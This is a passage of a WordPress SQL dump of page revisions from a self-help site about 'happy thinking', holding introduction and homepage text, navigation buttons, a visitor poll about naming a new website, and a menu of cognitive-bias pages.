problem.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The first person had ways of thinking that were â€œhelpfulâ€ as they did not make the personâ€™s sadness worse. Rather, this person''s helpful ways of thinking kept his or her mind in a state where it could effectively think about potential solutions. This personâ€™s positive outlook will help the person to move on and ultimately find a replacement job.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>On the other hand, the second personâ€™s thinking was â€œunhelpfulâ€ and made a bad situation worse. This person may well spiral into depression, which itself may make finding another job difficult.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>My ultimate aim in this website about happy thinking is to help you to recognise unhelpful thinking when it occurs in your mind and to give you mental techniques to effectively deal with such thinking. I have divided this website about Happy Thinking into two main parts:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In the first part, I will describe to you, in an easy to understand way, common types of unhelpful thinking. This will help you to recognise such thinking when it happens in your mind.&nbsp;&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In the second part, I will describe various special techniques that your mind can use to either change unhelpful thinking or help prevent such thinking from affecting you in a negative way. I like to think of such techniques, as â€œtoolsâ€, and just like a repairman will use various tools to repair something, you will be able to use these tools to deal with unhelpful thinking. These â€œtoolsâ€ are very practical so that you will be able to use them in your daily life.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In between describing unhelpful thinking and giving you tools to deal with such thinking, I will also sprinkle bits of wisdom about happiness that I have gathered from various places. Such wisdom may help you to see the world in a more accepting and positive way.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>So in essence, â€˜happy thinkingâ€ is about you recognising unhelpful thinking when it occurs in your mind and then using one or more tools to deal with such thinking. This along with a sprinkling of wisdom, should make you a happy person! I truly believe that you will enjoy and benefit from â€œHappy Thinkingâ€.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Please click below to continue.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:block {"ref":1346} /-->', 'Introduction', '', 'inherit', 'closed', 'closed', '', '1034-revision-v1', '', '', '2023-05-30 16:25:31', '2023-05-30 16:25:31', '', 1034, 'https://www.happythinking.com/?p=1599', 0, 'revision', '', 0),
(1597, 1, '2023-05-30 16:16:50', '2023-05-30 16:16:50', '<!-- wp:paragraph -->\n<p>First of all, I warmly welcome you to this website where I will tell you about â€œhappy thinkingâ€. The information I will present to you has certainly made me become a happier person and I am pleased to be able to share it with you so that you can benefit from it as well.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Let us begin with the question, â€œWhat do we actually mean when we say that a person is happy?â€ The answer to this basic question is not that straightforward. Despite the fact that all of us want to be happy, the concept of being â€œhappyâ€ is something that is quite difficult to define. This is because, â€œto be happyâ€ means different things to different people. I consider myself to be happy, when I am able to cope, without being stressed or depressed, with the various challenges that the world throws at me. Most of us desire to have a relatively easy life with little or no problems, but of course, the reality is that hardships and problems are part of everyone''s life. In the face of such challenges, if one is able to think in ways that are â€œhelpfulâ€ in dealing with those challenges and lets one remain calm and content, I would consider that person to be happy. This is of course not a perfect definition, but nevertheless is probably a good one to start with.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>A very important determinant of how happy one is, lies in the way oneâ€™s mind â€œthinksâ€. For example, imagine that two people, holding very good jobs, have been suddenly told that their company no longer needs them and that they will have to leave immediately. Both these people are now in an unfortunate situation where they will lose their generous salaries and perks.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>One of these people might think, â€œWell that was a great job, but that is no more. No point thinking of what I have lost, instead, I need to start job hunting as soon as possible so I can pay my household bills.â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>On the other hand, the other person might think, â€œHow terrible! Bad things only happen to me. I will never get another job. There is no point trying as the world is useless.â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In this example, you can see that both people had to face the same problem, but each had a markedly different way of â€œthinkingâ€ when dealing with the problem.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The first person had ways of thinking that were â€œhelpfulâ€ as they did not make the personâ€™s sadness worse. Rather, this person''s helpful ways of thinking kept his or her mind in a state where it could effectively think about potential solutions. This personâ€™s positive outlook will help the person to move on and ultimately find a replacement job.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>On the other hand, the second personâ€™s thinking was â€œunhelpfulâ€ and made a bad situation worse. This person may well spiral into depression, which itself may make finding another job difficult.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>My ultimate aim in this website about happy thinking is to help you to recognise unhelpful thinking when it occurs in your mind and to give you mental techniques to effectively deal with such thinking. I have divided this website about Happy Thinking into two main parts:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In the first part, I will describe to you, in an easy to understand way, common types of unhelpful thinking. This will help you to recognise such thinking when it happens in your mind.&nbsp;&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In the second part, I will describe various special techniques that your mind can use to either change unhelpful thinking or help prevent such thinking from affecting you in a negative way. I like to think of such techniques, as â€œtoolsâ€, and just like a repairman will use various tools to repair something, you will be able to use these tools to deal with unhelpful thinking. These â€œtoolsâ€ are very practical so that you will be able to use them in your daily life.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In between describing unhelpful thinking and giving you tools to deal with such thinking, I will also sprinkle bits of wisdom about happiness that I have gathered from various places. Such wisdom may help you to see the world in a more accepting and positive way.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>So in essence, â€˜happy thinkingâ€ is about you recognising unhelpful thinking when it occurs in your mind and then using one or more tools to deal with such thinking. This along with a sprinkling of wisdom, should make you a happy person! I truly believe that you will enjoy and benefit from â€œHappy Thinkingâ€.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Please click below to continue.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/about_me/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"19px"} -->\n<div style="height:19px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->', 'Introduction', '', 'inherit', 'closed', 'closed', '', '1034-revision-v1', '', '', '2023-05-30 16:16:50', '2023-05-30 16:16:50', '', 1034, 'https://www.happythinking.com/?p=1597', 0, 'revision', '', 0),
(1601, 1, '2023-05-30 16:39:59', '2023-05-30 16:39:59', '<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/about_me/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"19px"} -->\n<div style="height:19px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"50px"} -->\n<div style="height:50px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'prev_next_home buttons', '', 'inherit', 'closed', 'closed', '', '1346-revision-v1', '', '', '2023-05-30 16:39:59', '2023-05-30 16:39:59', '', 1346, 'https://www.happythinking.com/?p=1601', 0, 'revision', '', 0),
(1981, 1, '2023-06-30 08:35:40', '2023-06-30 08:35:40', '<!-- wp:separator {"className":"is-style-wide"} -->\n<hr class="wp-block-separator has-alpha-channel-opacity is-style-wide"/>\n<!-- /wp:separator -->\n\n<!-- wp:paragraph -->\n<p>Here is a small message from the author of this website: I would be grateful before you proceed, if you will answer this one question survey that will take you only a few seconds. I am planning to make a new website about a wise monk giving advice to a person on how to be happy. I need to choose a nice name for the website and to help me decide, I will be grateful if will click on one of the website names in the list below that you think is best. Then click "submit" and your choice will be anonymously recorded. This will really help me to decide on which name to use. Thank you for your kind help. You can proceed to visit the whole website for free after the survey. No more surveys or advertisements!</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:shortcode -->\n[yop_poll id="1"]\n<!-- /wp:shortcode -->\n\n<!-- wp:separator {"className":"is-style-wide"} -->\n<hr class="wp-block-separator has-alpha-channel-opacity is-style-wide"/>\n<!-- /wp:separator -->', 'survey', '', 'inherit', 'closed', 'closed', '', '1910-revision-v1', '', '', '2023-06-30 08:35:40', '2023-06-30 08:35:40', '', 1910, 'https://www.happythinking.com/?p=1981', 0, 'revision', '', 0),
(1985, 1, '2023-07-01 06:30:58', '2023-07-01 06:30:58', '<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:image {"align":"center","id":1977,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/home_happythinking270623.jpg" alt="" class="wp-image-1977"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>A universal desire of all human beings is to be happy. However, this can be quite challenging to achieve in our modern world which is full of high demands and stress. This website can help you to be happy.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The way oneâ€™s mind does its â€œthinkingâ€ plays a very important role in oneâ€™s happiness. Over time, oneâ€™s mind may develop certain ways of thinking that can negatively affect oneâ€™s mental well-being. Such â€œnegative thinkingâ€ is very common and on this website, I will describe them to you in an easy-to-understand way so that you will be able to recognise such thinking if it were to happen in your own mind. I will also share with you various mental methods that will help you to change negative thinking into more positive ways of thinking. These methods will be very practical so that you can use them in your daily life.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In essence, Happy Thinking is about recognising and changing negative ways of thinking so that you will find happiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>This website is truly free for you to benefit from (i.e. there is nothing to buy, download, register, etc). My sincere hope is that it will bring you happiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Click the button below to start reading about Happy Thinking.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link wp-element-button" href="https://www.happythinking.com/introduction/" style="border-radius:15px">Click to read</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"27px"} -->\n<div style="height:27px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Find happiness by changing how you think', '', 'inherit', 'closed', 'closed', '', '88-revision-v1', '', '', '2023-07-01 06:30:58', '2023-07-01 06:30:58', '', 88, 'https://www.happythinking.com/?p=1985', 0, 'revision', '', 0),
(1982, 1, '2023-06-30 08:36:41', '2023-06-30 08:36:41', '<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:image {"align":"center","id":1977,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/home_happythinking270623.jpg" alt="" class="wp-image-1977"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>A universal desire of all human beings is to be happy. However, this can be quite challenging to achieve in our modern world which is full of high demands and stress. This website can help you to be happy.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The way oneâ€™s mind does its â€œthinkingâ€ plays a very important role in oneâ€™s happiness. Over time, oneâ€™s mind may develop certain ways of thinking that can negatively affect oneâ€™s mental well-being. Such â€œnegative thinkingâ€ is very common and on this website, I will describe them to you in an easy-to-understand way so that you will be able to recognise such thinking if it were to happen in your own mind. I will also share with you various mental methods that will help you to change negative thinking into more positive ways of thinking. These methods will be very practical so that you can use them in your daily life.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In essence, Happy Thinking is about recognising and changing negative ways of thinking so that you will find happiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:block {"ref":1910} /-->\n\n<!-- wp:paragraph -->\n<p>This website is truly free for you to benefit from (i.e. there is nothing to buy, download, register, etc). My sincere hope is that it will bring you happiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Click the button below to start reading about Happy Thinking.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link wp-element-button" href="https://www.happythinking.com/introduction/" style="border-radius:15px">Click to read</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"27px"} -->\n<div style="height:27px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Find happiness by changing how you think', '', 'inherit', 'closed', 'closed', '', '88-revision-v1', '', '', '2023-06-30 08:36:41', '2023-06-30 08:36:41', '', 88, 'https://www.happythinking.com/?p=1982', 0, 'revision', '', 0),
(1595, 1, '2023-05-30 16:15:09', '2023-05-30 16:15:09', '<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/about_me/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"19px"} -->\n<div style="height:19px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->', 'prev_next_home buttons', '', 'inherit', 'closed', 'closed', '', '1346-revision-v1', '', '', '2023-05-30 16:15:09', '2023-05-30 16:15:09', '', 1346, 'https://www.happythinking.com/?p=1595', 0, 'revision', '', 0),
(1583, 1, '2023-05-30 10:29:50', '2023-05-30 10:29:50', '<!-- wp:columns {"align":"full"} -->\n<div class="wp-block-columns alignfull"><!-- wp:column {"width":"25%"} -->\n<div class="wp-block-column" style="flex-basis:25%"></div>\n<!-- /wp:column -->\n\n<!-- wp:column {"width":"50%"} -->\n<div class="wp-block-column" style="flex-basis:50%"><!-- wp:image {"align":"center","id":1578,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/home_happythinking300523.jpg" alt="" class="wp-image-1578"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column {"width":"25%"} -->\n<div class="wp-block-column" style="flex-basis:25%"></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n\n<!-- wp:paragraph -->\n<p>A universal desire of all human beings is to be happy. However, this can be quite challenging to achieve in our modern world which is full of high demands and stress. This website can help you to be happy.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Oneâ€™s mind plays a very important role in oneâ€™s happiness. Over time, oneâ€™s mind may develop certain â€œunhelpfulâ€ ways of thinking that can negatively affect oneâ€™s mental wellbeing. </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1581,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/unhappyspiral300523.jpg" alt="" class="wp-image-1581"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>On this website, I will describe to you, in an easy to understand way, various types of unhelpful thinking, so that you will be able to recognise such thinking when it happens in your mind. And very importantly, I will also give you practical ways to prevent such thinking from affecting you in a negative way. In essence, Happy Thinking is about not letting unhelpful ways of thinking get in the way of your happiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>This website is truly free for you to benefit from (i.e. there is nothing to buy, download, register, etc). My sincere hope is that it will bring you happiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Click the button below to start reading about Happy Thinking.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons -->\n<div class="wp-block-buttons"><!-- wp:button {"style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link wp-element-button" href="https://www.happythinking.com/introduction/" style="border-radius:15px">Click to read</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"27px"} -->\n<div style="height:27px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:separator {"opacity":"css","className":"is-style-wide"} -->\n<hr class="wp-block-separator has-css-opacity is-style-wide"/>\n<!-- /wp:separator -->\n\n<!-- wp:heading {"level":3} -->\n<h3 class="wp-block-heading">Menu</h3>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p><a href="https://www.happythinking.com/introduction/">Introduction</a></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><a href="https://www.happythinking.com/test/">test images</a></p>\n<!-- /wp:paragraph -->', 'How to change unhelpful ways of thinking', '', 'inherit', 'closed', 'closed', '', '88-revision-v1', '', '', '2023-05-30 10:29:50', '2023-05-30 10:29:50', '', 88, 'https://www.happythinking.com/?p=1583', 0, 'revision', '', 0),
(1582, 1, '2023-05-30 10:28:41', '2023-05-30 10:28:41', '<!-- wp:columns {"align":"full"} -->\n<div class="wp-block-columns alignfull"><!-- wp:column {"width":"25%"} -->\n<div class="wp-block-column" style="flex-basis:25%"></div>\n<!-- /wp:column -->\n\n<!-- wp:column {"width":"50%"} -->\n<div class="wp-block-column" style="flex-basis:50%"><!-- wp:image {"id":1578,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image size-full"><img src="https://www.happythinking.com/wp-content/uploads/home_happythinking300523.jpg" alt="" class="wp-image-1578"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column {"width":"25%"} -->\n<div class="wp-block-column" style="flex-basis:25%"></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n\n<!-- wp:paragraph -->\n<p>A universal desire of all human beings is to be happy. However, this can be quite challenging to achieve in our modern world which is full of high demands and stress. This website can help you to be happy.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Oneâ€™s mind plays a very important role in oneâ€™s happiness. Over time, oneâ€™s mind may develop certain â€œunhelpfulâ€ ways of thinking that can negatively affect oneâ€™s mental wellbeing. </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {"align":"center","id":1581,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image aligncenter size-full"><img src="https://www.happythinking.com/wp-content/uploads/unhappyspiral300523.jpg" alt="" class="wp-image-1581"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>On this website, I will describe to you, in an easy to understand way, various types of unhelpful thinking, so that you will be able to recognise such thinking when it happens in your mind. And very importantly, I will also give you practical ways to prevent such thinking from affecting you in a negative way. In essence, Happy Thinking is about not letting unhelpful ways of thinking get in the way of your happiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>This website is truly free for you to benefit from (i.e. there is nothing to buy, download, register, etc). My sincere hope is that it will bring you happiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Click the button below to start reading about Happy Thinking.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons -->\n<div class="wp-block-buttons"><!-- wp:button {"style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link wp-element-button" href="https://www.happythinking.com/introduction/" style="border-radius:15px">Click to read</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"27px"} -->\n<div style="height:27px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:separator {"opacity":"css","className":"is-style-wide"} -->\n<hr class="wp-block-separator has-css-opacity is-style-wide"/>\n<!-- /wp:separator -->\n\n<!-- wp:heading {"level":3} -->\n<h3 class="wp-block-heading">Menu</h3>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p><a href="https://www.happythinking.com/introduction/">Introduction</a></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><a href="https://www.happythinking.com/test/">test images</a></p>\n<!-- /wp:paragraph -->', 'How to change unhelpful ways of thinking', '', 'inherit', 'closed', 'closed', '', '88-revision-v1', '', '', '2023-05-30 10:28:41', '2023-05-30 10:28:41', '', 88, 'https://www.happythinking.com/?p=1582', 0, 'revision', '', 0),
(1527, 1, '2023-04-10 10:14:04', '2023-04-10 10:14:04', '<!-- wp:columns {"align":"full"} -->\n<div class="wp-block-columns alignfull"><!-- wp:column {"width":"25%"} -->\n<div class="wp-block-column" style="flex-basis:25%"></div>\n<!-- /wp:column -->\n\n<!-- wp:column {"width":"50%"} -->\n<div class="wp-block-column" style="flex-basis:50%"><!-- wp:image {"id":1251,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image size-full"><img src="https://www.happythinking.com/wp-content/uploads/2021/08/home_stupid300821.gif" alt="" class="wp-image-1251"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column {"width":"25%"} -->\n<div class="wp-block-column" style="flex-basis:25%"></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n\n<!-- wp:paragraph -->\n<p>Most of us assume that our brains â€œthinkâ€ in a sensible and logical way. However, in reality, psychologists have found that the human brain has a tendency to think in certain illogical ways which can make one make wrong judgments and decisions in oneâ€™s daily life. Such â€œstupid thinkingâ€ is extremely common and it happens to everyone, though most of us would not even realise that we are thinking in these ways.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>This completely free website explains, in a very easy to understand way, common types of stupid thinking that oneâ€™s brain may do. This will help you to recognise and correct such thinking when it happens in your own brain.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>This website is completely free to access so that everyone can benefit.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Click on the button below to start reading.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:block {"ref":1443} /-->\n\n<!-- wp:spacer {"height":"27px"} -->\n<div style="height:27px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:separator {"opacity":"css","className":"is-style-wide"} -->\n<hr class="wp-block-separator has-css-opacity is-style-wide"/>\n<!-- /wp:separator -->\n\n<!-- wp:heading {"level":3} -->\n<h3>Menu</h3>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p><a style="font-size: 14px;" href="https://www.stopstupidthinking.com/negativity_effect/">Negativity effect thinking</a></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><a style="font-size: 14px;" href="https://www.stopstupidthinking.com/spotlight_effect/">Spotlight effect thinking</a></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><a style="font-size: 14px;" href="https://www.stopstupidthinking.com/confirmation_bias/">Confirmation bias thinking</a></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><a href="https://www.stopstupidthinking.com/all_or_nothing/">All or nothing thinking</a></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><a href="https://www.stopstupidthinking.com/illusion_of_truth/">The illusion of truth thinking</a></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><a href="https://www.stopstupidthinking.com/halo_effect/">Halo effect thinking</a></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><a style="font-size: 14px;" href="https://www.stopstupidthinking.com/sunk_cost_fallacy/">Sunk cost fallacy thinking</a></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><a style="font-size: 14px;" href="https://www.stopstupidthinking.com/rosy_retrospection/">Rosy retrospection thinking</a></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><a href="https://www.stopstupidthinking.com/anchor_effect/">Anchor effect thinking</a></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><a style="font-size: 14px;" href="https://www.stopstupidthinking.com/online_nastiness/">Online nastiness thinking</a></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><a style="font-size: 14px;" href="https://www.stopstupidthinking.com/dunning_kruger_effect/">Dunning-Kruger effect thinking</a></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><a href="https://www.stopstupidthinking.com/counterfactual_thinking/">Counterfactual thinking</a></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><a href="https://www.stopstupidthinking.com/conclusion/">Conclusion</a><span style="font-size: 14px;">&nbsp;</span></p>\n<!-- /wp:paragraph -->', 'How to change unhelpful ways of thinking', '', 'inherit', 'closed', 'closed', '', '88-revision-v1', '', '', '2023-04-10 10:14:04', '2023-04-10 10:14:04', '', 88, 'https://www.happythinking.com/?p=1527', 0, 'revision', '', 0),
(1984, 1, '2023-06-30 13:00:44', '2023-06-30 13:00:44', '<!-- wp:separator {"className":"is-style-wide"} -->\n<hr class="wp-block-separator has-alpha-channel-opacity is-style-wide"/>\n<!-- /wp:separator -->\n\n<!-- wp:paragraph -->\n<p>Brief note from the author: I am planning to make a new website about a wise monk giving advice to a person on how to be happy. I need to choose a nice name for the website and to help me decide, I will be grateful if you will click on one of the website names below that you think is best.This will really help me to decide on which name to use. Thank you very much!</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:shortcode -->\n[yop_poll id="1"]\n<!-- /wp:shortcode -->\n\n<!-- wp:separator {"className":"is-style-wide"} -->\n<hr class="wp-block-separator has-alpha-channel-opacity is-style-wide"/>\n<!-- /wp:separator -->', 'survey', '', 'inherit', 'closed', 'closed', '', '1910-revision-v1', '', '', '2023-06-30 13:00:44', '2023-06-30 13:00:44', '', 1910, 'https://www.happythinking.com/?p=1984', 0, 'revision', '', 0),
